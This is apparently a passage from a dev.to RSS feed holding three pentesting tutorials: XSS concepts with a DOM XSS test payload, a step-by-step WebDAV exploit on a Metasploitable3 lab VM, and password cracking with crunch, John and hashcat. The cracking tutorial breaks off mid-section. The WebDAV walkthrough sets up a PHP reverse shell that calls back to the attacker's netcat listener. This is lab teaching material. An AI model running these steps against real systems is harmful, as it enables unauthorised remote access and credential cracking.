&lt;strong&gt;Definition:&lt;/strong&gt; Vulnerability lies within client-side code rather than server-side code.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Impact:&lt;/strong&gt; Facilitates script execution directly in the user's browser, often evading server-side detection.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Detection:&lt;/strong&gt; Challenging to detect server-side; requires client-side analysis or specialized tools.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Example:&lt;/strong&gt; Exploiting client-side JavaScript functions to execute malicious scripts.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Mitigation:&lt;/strong&gt; Implement client-side validation, avoid using unsafe DOM manipulation methods, and sanitize all user input. &lt;a href="https://www.acunetix.com/blog/web-security-zone/how-to-prevent-dom-based-cross-site-scripting/" rel="noopener noreferrer"&gt;Reference&lt;/a&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;&lt;strong&gt;Example from Acunetix:&lt;/strong&gt;&lt;br&gt;
   &lt;code&gt;http://testhtml5.vulnweb.com/#/redir?url=javascript:alert("DOM XSS on: " + document.domain)&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://www.acunetix.com/blog/web-security-zone/how-to-prevent-dom-based-cross-site-scripting/" rel="noopener noreferrer"&gt;How To Prevent DOM-based Cross-site Scripting - Acunetix 2019&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://www.acunetix.com/websitesecurity/cross-site-scripting/" rel="noopener noreferrer"&gt;Stealing Cookies Using XSS&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;🛑 &lt;strong&gt;Malicious JavaScript: Understanding and Consequences&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Malicious JavaScript refers to JavaScript code intentionally designed to compromise user security or cause harm during browsing sessions. Despite its limited environment within web browsers, JavaScript still holds access to sensitive user information and can manipulate webpage elements.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Consequences of Malicious JavaScript:&lt;/strong&gt;&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Cookie Theft:&lt;/strong&gt; Accesses user's cookies associated with a website. Transmits stolen cookies to a remote server controlled by the attacker. Enables unauthorized access to sensitive information like session IDs.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Keylogging:&lt;/strong&gt; Registers keyboard event listeners to capture user keystrokes. Sends captured keystrokes to a remote server. Facilitates the recording of sensitive information such as passwords and credit card numbers.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Phishing:&lt;/strong&gt; Manipulates webpage HTML to insert fake login forms or deceptive elements. Redirects users to fake forms to capture their input. Tricks users into submitting sensitive information like login credentials or personal details.&lt;/p&gt;&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;🔚 &lt;strong&gt;Conclusion&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Malicious JavaScript poses significant security risks, allowing attackers to exploit vulnerabilities and compromise user data. Vigilance and robust security measures are crucial to detect and mitigate the harmful effects of malicious code during browsing sessions.&lt;/p&gt;

&lt;p&gt;🔒 &lt;strong&gt;Prevention Measures&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;To mitigate XSS vulnerabilities, implementing robust security measures is imperative:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Data Sanitization:&lt;/strong&gt; Ensure all input and output data is properly sanitized to mitigate XSS risks.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Internationalization (I18n):&lt;/strong&gt; Make web applications translation-ready using secure translation functions.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Escape Functions:&lt;/strong&gt; Utilize escape functions when rendering dynamic content to prevent XSS vulnerabilities.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;🛠️ &lt;strong&gt;Exploitation Techniques of XSS&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Cybercriminals exploit XSS vulnerabilities to coerce web applications into executing malicious scripts, often by manipulating data input mechanisms such as forms or API endpoints.&lt;/p&gt;

&lt;p&gt;⚠️ &lt;strong&gt;Ramifications of XSS Attacks&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;XSS attacks can result in significant damage by facilitating data theft, malware installation, and unauthorized access. They can tarnish a company’s reputation and lead to website defacement or dissemination of false information.&lt;/p&gt;

&lt;p&gt;🧪 &lt;strong&gt;Test Examples&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Various platforms offer avenues to test XSS vulnerabilities, providing valuable insights into potential security weaknesses and the effectiveness of mitigation strategies.&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;&lt;a href="http://sudo.co.il/xss/" rel="noopener noreferrer"&gt;XSS Test Examples&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="http://testphp.vulnweb.com/" rel="noopener noreferrer"&gt;Vulnerable Site&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://xss-game.appspot.com/level1" rel="noopener noreferrer"&gt;XSS Game&lt;/a&gt;
s&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;📚 &lt;strong&gt;References&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://ensurtec.com/dvwa-part-2-exploiting-cross-site-scripting-xss-vulnerabilities/" rel="noopener noreferrer"&gt;Ensurtec - DVWA Part 2: Exploiting Cross-Site Scripting (XSS) Vulnerabilities&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;[Medium - Exploiting Stored XSS in Damn Vulnerable Web Application (DVWA)](&lt;a href="https://medium.com/@hashsleuth.info/exploiting-stored-xss-in-damn-vw" rel="noopener noreferrer"&gt;https://medium.com/@hashsleuth.info/exploiting-stored-xss-in-damn-vw&lt;/a&gt;...&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.stackzero.net/stored-xss-dvwa/" rel="noopener noreferrer"&gt;StackZero - Stored XSS DVWA&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://brightsec.com/blog/xss-attack/" rel="noopener noreferrer"&gt;BrightSec - XSS Attack&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://medium.com/@Land2Cyber/real-world-examples-of-xss-attacks-and-how-they-were-executed-531e0e33e85b" rel="noopener noreferrer"&gt;Real-world examples of XSS attacks and how they were executed - Land2Cyber&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://portswigger.net/web-security/cross-site-scripting/reflected" rel="noopener noreferrer"&gt;Reflected XSS - Port Swigger&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://portswigger.net/web-security/cross-site-scripting/stored" rel="noopener noreferrer"&gt;Stored XSS - Port Swigger&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://excess-xss.com/" rel="noopener noreferrer"&gt;Excess XSS&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://pentest-tools.com/blog/xss-attacks-practical-scenarios" rel="noopener noreferrer"&gt;Pentest-Tools - XSS Attacks Practical Scenarios&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;




</description>
      <category>xss</category>
      <category>javascript</category>
      <category>ethicalhacking</category>
      <category>pentesting</category>
    </item>
    <item>
      <title>Reverse Shell on MetaSploitable3 Windows</title>
      <dc:creator>And Go Web Solutions | AGWS</dc:creator>
      <pubDate>Thu, 01 Feb 2024 01:47:16 +0000</pubDate>
      <link>https://dev.to/agws/reverse-shell-on-metasploitable3-windows-1k5o</link>
      <guid>https://dev.to/agws/reverse-shell-on-metasploitable3-windows-1k5o</guid>
      <description>&lt;h3&gt;
  
  
  In-Depth Steps for WebDAV Exploitation
&lt;/h3&gt;

&lt;p&gt;WebDAV (Web Distributed Authoring and Versioning) is an extension of the HTTP protocol that allows users to collaboratively edit and manage files on remote web servers. In this guide, we'll explore the process of exploiting a target with a vulnerable WebDAV service to gain remote access using a PHP reverse shell. This tutorial assumes you have the necessary permissions to perform penetration testing on the target network.&lt;/p&gt;

&lt;h4&gt;
  
  
  Information Gathering
&lt;/h4&gt;

&lt;p&gt;&lt;strong&gt;Step 0: Check Router IP from eth0 on your Kali Machine&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;ip addr
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;em&gt;Example Results:&lt;/em&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;inet 192.168.1.10/24 brd 192.168.1.255 scope global dynamic noprefixroute eth0
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Step 1: Quick arp-scan&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;arp-scan 192.168.1.1/24
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;em&gt;Example Results:&lt;/em&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;192.168.1.3     02:f9:8e:69:9e:55       (Unknown: locally administered)
192.168.1.1     e0:19:54:46:e5:6e       zte corporation
192.168.1.11    08:00:27:e7:c3:e8       PCS Systemtechnik GmbH
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Step 2: Nmap Scan for All Ports and OS Detection&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;nmap &lt;span class="nt"&gt;-Pn&lt;/span&gt; &lt;span class="nt"&gt;-T4&lt;/span&gt; &lt;span class="nt"&gt;-vv&lt;/span&gt; &lt;span class="nt"&gt;-A&lt;/span&gt; &lt;span class="nt"&gt;-p1-65535&lt;/span&gt; 192.168.1.1/24 &lt;span class="o"&gt;&amp;gt;&lt;/span&gt; /home/kali/Desktop/network-arp-scan.txt
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;em&gt;Example Results:&lt;/em&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Discovered open port 2869/tcp on 192.168.1.3
Discovered open port 7676/tcp on 192.168.1.11
Discovered open port 23/tcp on 192.168.1.1

// Also the open port 8585 for the WebDav 
PORT     STATE SERVICE REASON         VERSION
8585/tcp open  unknown syn-ack ttl 64
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;em&gt;Nmap scan report for 192.168.1.11:&lt;/em&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;OS details: Microsoft Windows 7 SP0 - SP1, Windows Server 2008 SP1, Windows Server 2008 R2, Windows 8, or Windows 8.1 Update 1
TCP/IP fingerprint:
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Step 3: Davtest for WebDAV&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;davtest &lt;span class="nt"&gt;-auth&lt;/span&gt; admin:password &lt;span class="nt"&gt;-sendbd&lt;/span&gt; &lt;span class="nt"&gt;-auto&lt;/span&gt; &lt;span class="nt"&gt;-url&lt;/span&gt; http://192.168.1.11:8585/uploads
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;em&gt;Example Results:&lt;/em&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Testing DAV connection
OPEN            SUCCEED:                http://192.168.1.11:8585/uploads
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h4&gt;
  
  
  WebDAV Exploitation
&lt;/h4&gt;

&lt;p&gt;&lt;strong&gt;Step 4: Copy PHP Reverse Shell to Desktop&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;cp&lt;/span&gt; /usr/share/webshells/php/php-reverse-shell.php /home/kali/Desktop
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Step 5: Edit PHP Reverse Shell&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Edit &lt;code&gt;/home/kali/Desktop/php-reverse-shell.php&lt;/code&gt;:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight php"&gt;&lt;code&gt;&lt;span class="nv"&gt;$ip&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="s1"&gt;'192.168.1.10'&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;  &lt;span class="c1"&gt;// Kali machine IP&lt;/span&gt;
&lt;span class="nv"&gt;$port&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;7779&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;           &lt;span class="c1"&gt;// TCP/UDP Port&lt;/span&gt;
&lt;span class="nv"&gt;$shell&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="s1"&gt;'cmd.exe'&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;     &lt;span class="c1"&gt;// Use cmd.exe for Windows&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Step 6: Start Netcat Listener on Kali&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;nc &lt;span class="nt"&gt;-lvnp&lt;/span&gt; 7779
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Step 7: Upload PHP Reverse Shell Using Cadaver&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;cadaver http://192.168.1.11:8585/uploads
dav:/uploads/&amp;gt; put /home/kali/Desktop/php-reverse-shell.php
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Step 8: Check Netcat Listener for Shell&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;nc &lt;span class="nt"&gt;-lnvp&lt;/span&gt; 7779
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Now, you should have a reverse shell connection. Adapt the commands based on your specific scenario and environment.&lt;/p&gt;

&lt;h3&gt;
  
  
  Explanation:
&lt;/h3&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Information Gathering:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;em&gt;Step 0&lt;/em&gt;: Check the router IP to identify the local network's subnet.&lt;/li&gt;
&lt;li&gt;
&lt;em&gt;Step 1&lt;/em&gt;: Use arp-scan to discover active hosts on the network.&lt;/li&gt;
&lt;li&gt;
&lt;em&gt;Step 2&lt;/em&gt;: Perform an Nmap scan to find open ports and detect the operating system.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;WebDAV Exploitation:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;em&gt;Step 3&lt;/em&gt;: Use davtest to verify that the WebDAV service is accessible.&lt;/li&gt;
&lt;li&gt;
&lt;em&gt;Step 4&lt;/em&gt;: Copy a PHP reverse shell script to the attacker's machine.&lt;/li&gt;
&lt;li&gt;
&lt;em&gt;Step 5&lt;/em&gt;: Edit the PHP script with the attacker's IP and desired port.&lt;/li&gt;
&lt;li&gt;
&lt;em&gt;Step 6&lt;/em&gt;: Start a Netcat listener on Kali to receive the reverse shell connection.&lt;/li&gt;
&lt;li&gt;
&lt;em&gt;Step 7&lt;/em&gt;: Upload the modified PHP script to the target using Cadaver.&lt;/li&gt;
&lt;li&gt;
&lt;em&gt;Step 8&lt;/em&gt;: Check the Netcat listener for a successful reverse shell.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;Remember to ensure ethical and legal use of penetration testing tools and techniques. Unauthorized access to computer systems is illegal and unethical. Always obtain proper authorization before performing penetration tests on any network.&lt;/p&gt;

</description>
      <category>php</category>
      <category>security</category>
      <category>linux</category>
      <category>reverse</category>
    </item>
    <item>
      <title>Word lists ,Crunch, John and Hash Cat - All Kali Word List Tools Explained.</title>
      <dc:creator>And Go Web Solutions | AGWS</dc:creator>
      <pubDate>Thu, 25 Jan 2024 22:30:00 +0000</pubDate>
      <link>https://dev.to/agws/wordlists-crunch-john-and-hash-cat-all-kali-word-list-tools-explained-5550</link>
      <guid>https://dev.to/agws/wordlists-crunch-john-and-hash-cat-all-kali-word-list-tools-explained-5550</guid>
      <description>&lt;h2&gt;
  
  
  🔐 Overview Of Wordlists ,Crunch, John and Hash Cat - All Kali Word List Tools Explained.🔐
&lt;/h2&gt;

&lt;h3&gt;
  
  
  Common Password Formats
&lt;/h3&gt;

&lt;p&gt;Understanding password security is crucial, considering different encryption methods for a password like "R@nT4g*Ne!":&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;SHA-1:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Output: 12bf203295c014c580302f4fae101817ec085949&lt;/li&gt;
&lt;li&gt;Characteristics: 40 characters, no clear decryption method.&lt;/li&gt;
&lt;/ul&gt;


&lt;/li&gt;

&lt;li&gt;

&lt;p&gt;&lt;strong&gt;SHA-1 with Salt:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Output: bc6b79c7716722cb383321e40f31734bce0c3598&lt;/li&gt;
&lt;li&gt;Characteristics: 40 characters, with the addition of the word "Free."&lt;/li&gt;
&lt;/ul&gt;


&lt;/li&gt;

&lt;li&gt;

&lt;p&gt;&lt;strong&gt;MD5:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Output: 4e84f7e8ce5ba8cdfe99d4ff41dc2d41&lt;/li&gt;
&lt;li&gt;Characteristics: Encoded into a 128-bit string.&lt;/li&gt;
&lt;/ul&gt;


&lt;/li&gt;

&lt;li&gt;

&lt;p&gt;&lt;strong&gt;AES (Advanced Encryption Standard):&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Characteristics: Utilizes a symmetric encryption algorithm with a variable bit length.&lt;/li&gt;
&lt;/ul&gt;


&lt;/li&gt;

&lt;/ul&gt;

&lt;p&gt;-- Encryption Algorithms&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;SHA-1-512 (-1-512) Stands for the buffer size when that increases the level of encryption is higher.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;-- One Way Hash - Designed for cryptography&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;MD5 and MD4 example (Not Recommended to be Used Vulnerable).&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Lets Checkout some commands basics.&lt;/p&gt;

&lt;h3&gt;
  
  
  Commands Basics
&lt;/h3&gt;

&lt;p&gt;This command is used to generate an actual&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;echo&lt;/span&gt; &lt;span class="nt"&gt;-n&lt;/span&gt; &lt;span class="s2"&gt;"adminpassword"&lt;/span&gt; | &lt;span class="nb"&gt;sha1sum&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Result :&lt;br&gt;
&lt;br&gt;
 &lt;code&gt;bash efacc4001e857f7eba4ae781c2932dedf843865e&lt;/code&gt;&lt;br&gt;
&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;&lt;p&gt;HashID is used to determine the type of hash &lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Create a new file called new.hash&lt;br&gt;
&lt;/p&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;touch &lt;/span&gt;new.hash
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;ul&gt;
&lt;li&gt;Use the nano text editor the copy the result above or create your own.
&lt;/li&gt;
&lt;/ul&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;nano new.hash
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;ul&gt;
&lt;li&gt;&lt;p&gt;Note : Inside nano to save the file press CTRL + X and then Y then ENTER To save the file .&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Now use hashid to determine what hash type this file is using&lt;br&gt;
&lt;/p&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;hashid &lt;span class="nt"&gt;-m&lt;/span&gt; new.hash
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;ol&gt;
&lt;li&gt;Crunch
The Command Used here Creates lists with every possible combination of number, you can also use crunch with uppercase and lowercase letters , special characters.
&lt;/li&gt;
&lt;/ol&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;Syntax
Usage: crunch &amp;lt;min&amp;gt; &amp;lt;max&amp;gt; &lt;span class="o"&gt;[&lt;/span&gt;options]

┌──&lt;span class="o"&gt;(&lt;/span&gt;root㉿kali&lt;span class="o"&gt;)&lt;/span&gt;-[~]
└─# crunch 1 3 0123456789 &lt;span class="nt"&gt;-O&lt;/span&gt; /home/kali/Desktop/phonepassword.txt 

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;ul&gt;
&lt;li&gt;Optional Commands for testing &lt;/li&gt;
&lt;li&gt;Its Optional (Requires alot of PC Resources).
&lt;/li&gt;
&lt;/ul&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;┌──&lt;span class="o"&gt;(&lt;/span&gt;root㉿kali&lt;span class="o"&gt;)&lt;/span&gt;-[~]
└─# crunch 3 10 0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ 
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;ul&gt;
&lt;li&gt;Optional - Add generated list to already existing file like rockyou.txt
&lt;/li&gt;
&lt;/ul&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;┌──(root㉿kali)-[~]
└─# crunch 1 3 0123456789 &amp;gt;&amp;gt; /usr/share/wordlists/rockyou.txt

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h4&gt;
  
  
  1. Wordlists
&lt;/h4&gt;

&lt;p&gt;Simply used to generate rockyou.txt and show Word List Files on Kali.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;┌──&lt;span class="o"&gt;(&lt;/span&gt;root㉿kali&lt;span class="o"&gt;)&lt;/span&gt;-[~]
└─# wordlists 

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Result&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;/usr/share/wordlists
├── amass - /usr/share/amass/wordlists
├── dirb - /usr/share/dirb/wordlists
├── dirbuster - /usr/share/dirbuster/wordlists
├── fasttrack.txt - /usr/share/set/src/fasttrack/wordlist.txt
├── fern-wifi - /usr/share/fern-wifi-cracker/extras/wordlists
├── john.lst - /usr/share/john/password.lst
├── legion - /usr/share/legion/wordlists
├── metasploit - /usr/share/metasploit-framework/data/wordlists
├── nmap.lst - /usr/share/nmap/nselib/data/passwords.lst
├── rockyou.txt
├── rockyou.txt.gz
├── sqlmap.txt - /usr/share/sqlmap/data/txt/wordlist.txt
├── wfuzz - /usr/share/wfuzz/wordlist
└── wifite.txt - /usr/share/dict/wordlist-probable.txt

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;





&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;┌──(root㉿kali)-[~]
└─# cd /usr/share/wordlists // cd into wordlists directory 
┌──(root㉿kali)-[~]
└─# ls -la // list all directory items
┌──(root㉿kali)-[~]
└─# gunzip /usr/share/wordlists/rockyou.txt.gz //extracts rockyou.txt if not extracted already
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h4&gt;
  
  
  2. John The Ripper
&lt;/h4&gt;

&lt;p&gt;Always check the -h or --help option for any tool used on kali to check the syntax and options.&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Review Options &amp;lt;/&amp;gt;
&lt;/li&gt;
&lt;/ul&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;┌──&lt;span class="o"&gt;(&lt;/span&gt;root㉿kali&lt;span class="o"&gt;)&lt;/span&gt;-[~]
└─#john &lt;span class="nt"&gt;--help&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;ul&gt;
&lt;li&gt;Check File Formats John Can Crack. &amp;lt;/&amp;gt;
&lt;/li&gt;
&lt;/ul&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;┌──(root㉿kali)-[~]
└─# john --list=formats // formats and protocols that can be used with john
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;





&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;┌──&lt;span class="o"&gt;(&lt;/span&gt;root㉿kali&lt;span class="o"&gt;)&lt;/span&gt;-[~]
└─#john &lt;span class="nt"&gt;--wordlist&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;/usr/share/wordlists/rockyou.txt &lt;span class="nt"&gt;--format&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;Raw-SHA1 &lt;span class="nt"&gt;--fork2&lt;/span&gt; SHA1.txt
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;





&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;┌──&lt;span class="o"&gt;(&lt;/span&gt;root㉿kali&lt;span class="o"&gt;)&lt;/span&gt;-[~]
└─#john &lt;span class="nt"&gt;--show&lt;/span&gt; &lt;span class="nt"&gt;--format&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;Raw-SHA1 SHA1.txt
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The Same commands apply for SHA224, SHA256, MD5, MD4 for example and the check the formats that john support with the command provided in the above. &lt;/p&gt;

&lt;h4&gt;
  
  
  3. HashCat - Advanced Password Cracker
&lt;/h4&gt;

&lt;ul&gt;
&lt;li&gt;Utilizes markov statistical theory A russian scientist - with AI.🤖&lt;/li&gt;
&lt;li&gt;Check PassGAN &lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;🔑 Core Attack Modes 🔑&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Dictionary Attack - Tries all words in a list, also known as "straight" mode. (Attack mode 0, -a 0)&lt;/li&gt;
&lt;li&gt;Combinator Attack - Concatenates words from multiple wordlists. (-a 1)&lt;/li&gt;
&lt;li&gt;Brute-force Attack and Mask Attack - Tries all characters from given charsets, per position. (-a 3)&lt;/li&gt;
&lt;li&gt;Hybrid Attack - Combines wordlists with masks (-a 6) and masks with wordlists (-a 7); can also be done with rules.&lt;/li&gt;
&lt;li&gt;Association Attack - Uses additional information like a username, filename, or hint to attack a specific hash. (-a 9)&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Read more about Markov Chains.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;hashcat &lt;span class="nt"&gt;--help&lt;/span&gt;
hashcat &lt;span class="nt"&gt;-m&lt;/span&gt; 100 new.hash rockyou.txt
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h4&gt;
  
  
  4. MSF/WordLists
&lt;/h4&gt;

&lt;p&gt;Check MetaSploit WordLists&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
